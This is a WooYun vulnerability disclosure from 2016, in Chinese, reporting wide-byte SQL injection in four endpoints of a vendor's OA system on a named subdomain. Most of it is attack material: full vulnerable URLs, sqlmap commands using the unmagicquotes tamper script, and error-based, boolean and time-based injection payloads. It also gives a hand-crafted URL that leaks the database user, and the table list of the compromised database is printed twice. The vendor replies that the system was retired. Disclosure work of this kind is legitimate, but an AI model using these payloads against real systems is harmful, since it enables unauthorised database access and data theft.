当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0186457

漏洞标题:炎龙COG宽字节合集 都是root权限(外加绝对路径)

相关厂商:炎龙COG

漏洞作者: DeadSea

提交时间:2016-03-21 08:41

修复时间:2016-03-21 15:40

公开时间:2016-03-21 15:40

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-03-21: 细节已通知厂商并且等待厂商处理中
2016-03-21: 厂商已经确认,细节仅向厂商公开
2016-03-21: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

万水千山总是情。来次大厂行不行

详细说明:

http://jira.bltech.cn/general/score/flow/scoredate/result.php?FLOW_ID=%bf%27%20


报错出现绝对路径 FLOW_ID=存在宽字节注入

sqlmap identified the following injection point(s) with a total of 308 HTTP(s) r
equests:
---
Parameter: FLOW_ID (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: FLOW_ID=-1617' OR 5277=5277#
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY cl
ause
Payload: FLOW_ID=' AND (SELECT 9301 FROM(SELECT COUNT(*),CONCAT(0x7176786a71
,(SELECT (ELT(9301=9301,1))),0x716a7a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SC
HEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: FLOW_ID=' AND (SELECT * FROM (SELECT(SLEEP(5)))gmaf)
---
[00:27:05] [WARNING] changes made by tampering scripts are not included in shown
payload content(s)
[00:27:05] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.2.10, Apache 2.2.11
back-end DBMS: MySQL 5.0


sql命令

sqlmap.py -u "http://jira.bltech.cn/general/score/flow/scoredate/result.php?FLOW_ID=" --tamper unmagicquotes.py


第二处

http://jira.bltech.cn/interface/auth.php?&PASSWORD=1&USER_ID=


USER_ID存在宽字节注入

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: USER_ID (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY cl
ause
Payload: &PASSWORD=1&USER_ID=%df' AND (SELECT 5019 FROM(SELECT COUNT(*),CON
CAT(0x7171627671,(SELECT (ELT(5019=5019,1))),0x716b717a71,FLOOR(RAND(0)*2))x FRO
M INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- KDYR
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 RLIKE time-based blind
Payload: &PASSWORD=1&USER_ID=%df' RLIKE SLEEP(5)-- uKGP
---
[00:28:39] [WARNING] changes made by tampering scripts are not included in shown
payload content(s)
[00:28:39] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.2.10, Apache 2.2.11
back-end DBMS: MySQL 5.0


sqlmap命令

sqlmap.py -u "http://jira.bltech.cn/interface/auth.php?&PASSWORD=1&USER_ID=" --tamper unmagicquotes.py


第三处

http://jira.bltech.cn/module/sel_seal/get.php?ID=


ID=存在宽字节注入

sqlmap identified the following injection point(s) with a total of 1334 HTTP(s)
requests:
---
Parameter: ID (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY cl
ause
Payload: ID=' AND (SELECT 9615 FROM(SELECT COUNT(*),CONCAT(0x716b716271,(SEL
ECT (ELT(9615=9615,1))),0x7170717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.
CHARACTER_SETS GROUP BY x)a)
---
[00:40:06] [WARNING] changes made by tampering scripts are not included in shown
payload content(s)
[00:40:06] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.2.10, Apache 2.2.11
back-end DBMS: MySQL 5.0


sqlmap命令

sqlmap.py -u "http://jira.bltech.cn/module/sel_seal/get.php?ID=" --tamper unmagicquotes.py


第四处懒得跑了

http://jira.bltech.cn/ispirit/logincheck.php?USEING_KEY=2&USERNAME=sea%df%27%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x3a,(MID((IFNULL(CAST(USER()%20AS%20CHAR),0x20)),1,50)),0x3a,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)--%20sea


直接爆出root帐号~
全都是root权限

Database: td_oa
[190 tables]
+----------------------+
| user |
| version |
| address |
| address_group |
| affair |
| app_config |
| app_log |
| attachment_edit |
| attend_config |
| attend_duty |
| attend_evection |
| attend_holiday |
| attend_leave |
| attend_manager |
| attend_out |
| bbs_board |
| bbs_comment |
| book_info |
| book_manage |
| book_manager |
| book_type |
| bs_line |
| calendar |
| categories_type |
| censor_data |
| censor_module |
| censor_words |
| chatroom |
| contact |
| contract |
| contract_line |
| countdown |
| cp_asset_type |
| cp_assetcfg |
| cp_cptl_info |
| cp_dpct_sub |
| cp_prcs_prop |
| customer |
| department |
| dept_map |
| diary |
| diary_comment |
| diary_comment_reply |
| efax_account |
| efax_receive_box |
| efax_send_box |
| email |
| email_body |
| email_box |
| exam_data |
| exam_flow |
| exam_paper |
| exam_quiz |
| exam_quiz_set |
| ext_user |
| field_date |
| fieldsetting |
| file_content |
| file_sort |
| flow_form_type |
| flow_print_tpl |
| flow_process |
| flow_query_tpl |
| flow_rule |
| flow_run |
| flow_run_data |
| flow_run_feedback |
| flow_run_log |
| flow_run_prcs |
| flow_sort |
| flow_timer |
| flow_type |
| hrms |
| icqcontact_tb |
| icqmsgs_tb |
| icqservermsg_tb |
| interface |
| ip_rule |
| linkman |
| meeting |
| meeting_equipment |
| meeting_room |
| module_priv |
| mytable |
| netchat |
| netdisk |
| netmeeting |
| news |
| news_comment |
| notes |
| notify |
| oa_source |
| oa_source_used |
| oc_log |
| office_products |
| office_task |
| office_transhistory |
| order_line |
| picture |
| plan_type |
| product |
| proj_bug |
| proj_comment |
| proj_cost |
| proj_file |
| proj_file_log |
| proj_file_sort |
| proj_forum |
| proj_priv |
| proj_project |
| proj_task |
| proj_task_log |
| provider |
| provider_linkman |
| rms_file |
| rms_lend |
| rms_roll |
| rms_roll_room |
| rsa_keypair |
| sal_data |
| sal_flow |
| sal_item |
| sale_history |
| sale_manager |
| score_date |
| score_flow |
| score_group |
| score_item |
| seal |
| seal_keylic |
| seal_log |
| secure_key |
| service |
| sms |
| sms2 |
| sms2_priv |
| sms3 |
| sms_body |
| supply_history |
| supply_order |
| sys_code |
| sys_function |
| sys_log |
| sys_menu |
| sys_para |
| task |
| train_apply |
| train_appoint_muster |
| train_assess_data |
| train_assess_item |
| train_assess_title |
| train_courses |
| train_ctype |
| train_info |
| train_mail |
| train_manager |
| train_newcourse |
| train_survey_data |
| train_survey_item |
| train_survey_title |
| train_teachers |
| train_ttype |
| uni1 |
| unit |
| url |
| user_group |
| user_map |
| user_online |
| user_priv |
| vehicle |
| vehicle_maintenance |
| vehicle_operator |
| vehicle_usage |
| versio1 |
| vi_flow_run |
| vi_user |
| vote_data |
| vote_item |
| vote_title |
| webmail |
| wiki_ask |
| wiki_ask_answer |
| wiki_comment |
| wiki_info |
| winexe |
| word_model |
| work_detail |
| work_person |
| work_plan |
| zl_file |
+----------------------+

漏洞证明:

Database: td_oa
[190 tables]
+----------------------+
| user |
| version |
| address |
| address_group |
| affair |
| app_config |
| app_log |
| attachment_edit |
| attend_config |
| attend_duty |
| attend_evection |
| attend_holiday |
| attend_leave |
| attend_manager |
| attend_out |
| bbs_board |
| bbs_comment |
| book_info |
| book_manage |
| book_manager |
| book_type |
| bs_line |
| calendar |
| categories_type |
| censor_data |
| censor_module |
| censor_words |
| chatroom |
| contact |
| contract |
| contract_line |
| countdown |
| cp_asset_type |
| cp_assetcfg |
| cp_cptl_info |
| cp_dpct_sub |
| cp_prcs_prop |
| customer |
| department |
| dept_map |
| diary |
| diary_comment |
| diary_comment_reply |
| efax_account |
| efax_receive_box |
| efax_send_box |
| email |
| email_body |
| email_box |
| exam_data |
| exam_flow |
| exam_paper |
| exam_quiz |
| exam_quiz_set |
| ext_user |
| field_date |
| fieldsetting |
| file_content |
| file_sort |
| flow_form_type |
| flow_print_tpl |
| flow_process |
| flow_query_tpl |
| flow_rule |
| flow_run |
| flow_run_data |
| flow_run_feedback |
| flow_run_log |
| flow_run_prcs |
| flow_sort |
| flow_timer |
| flow_type |
| hrms |
| icqcontact_tb |
| icqmsgs_tb |
| icqservermsg_tb |
| interface |
| ip_rule |
| linkman |
| meeting |
| meeting_equipment |
| meeting_room |
| module_priv |
| mytable |
| netchat |
| netdisk |
| netmeeting |
| news |
| news_comment |
| notes |
| notify |
| oa_source |
| oa_source_used |
| oc_log |
| office_products |
| office_task |
| office_transhistory |
| order_line |
| picture |
| plan_type |
| product |
| proj_bug |
| proj_comment |
| proj_cost |
| proj_file |
| proj_file_log |
| proj_file_sort |
| proj_forum |
| proj_priv |
| proj_project |
| proj_task |
| proj_task_log |
| provider |
| provider_linkman |
| rms_file |
| rms_lend |
| rms_roll |
| rms_roll_room |
| rsa_keypair |
| sal_data |
| sal_flow |
| sal_item |
| sale_history |
| sale_manager |
| score_date |
| score_flow |
| score_group |
| score_item |
| seal |
| seal_keylic |
| seal_log |
| secure_key |
| service |
| sms |
| sms2 |
| sms2_priv |
| sms3 |
| sms_body |
| supply_history |
| supply_order |
| sys_code |
| sys_function |
| sys_log |
| sys_menu |
| sys_para |
| task |
| train_apply |
| train_appoint_muster |
| train_assess_data |
| train_assess_item |
| train_assess_title |
| train_courses |
| train_ctype |
| train_info |
| train_mail |
| train_manager |
| train_newcourse |
| train_survey_data |
| train_survey_item |
| train_survey_title |
| train_teachers |
| train_ttype |
| uni1 |
| unit |
| url |
| user_group |
| user_map |
| user_online |
| user_priv |
| vehicle |
| vehicle_maintenance |
| vehicle_operator |
| vehicle_usage |
| versio1 |
| vi_flow_run |
| vi_user |
| vote_data |
| vote_item |
| vote_title |
| webmail |
| wiki_ask |
| wiki_ask_answer |
| wiki_comment |
| wiki_info |
| winexe |
| word_model |
| work_detail |
| work_person |
| work_plan |
| zl_file |
+----------------------+

修复方案:

版权声明:转载请注明来源 DeadSea@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2016-03-21 15:38

厂商回复:

感谢您。
经业务确认,此sub domain下的业务系统已废弃,现已通知运维关闭此服务。

最新状态:

2016-03-21:再次感谢。这是已废弃的业务系统,彻底关闭了。


漏洞评价:

评价